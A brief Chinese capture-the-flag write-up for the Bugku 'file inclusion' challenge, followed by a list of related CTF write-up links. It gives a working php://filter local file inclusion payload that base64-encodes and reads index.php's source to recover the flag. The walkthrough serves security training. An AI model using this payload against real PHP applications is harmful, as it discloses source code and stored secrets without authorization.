bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
不拿flag不改名8 天前
[ACTF2020 新生赛]Upload1
android·ctf
kangsf19898 天前
BUUCTF 之Basic 1(BUU LFI COURSE 1)
靶场·ctf·buuctf
不拿flag不改名9 天前
[极客大挑战 2019]Http
ctf
CH13hh10 天前
常回家看看之house of kiwi
pwn·ctf··house
Jay 1710 天前
第四届“长城杯”网络安全大赛 暨京津冀网络安全技能竞赛(初赛) 全方向 题解WriteUp
安全·web安全·密码学·二进制·ctf·长城杯·安全杂项
亿.611 天前
[FBCTF2019]RCEService
web·ctf·buuctf
剁椒排骨11 天前
BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin
网络·网络协议·http·网络安全·web·ctf·字典爆破
Jay 1715 天前
2024 第七届“巅峰极客”网络安全技能挑战赛初赛 Web方向 题解WirteUp
安全·web安全·php·ctf·writeup·wp·巅峰极客
爱吃红薯拔丝的小鹿16 天前
CTFHub技能树-备份文件下载-vim缓存
ctf
梦 & 醒17 天前
BaseCTF-week2-wp
网络·安全·web安全·网络安全·ctf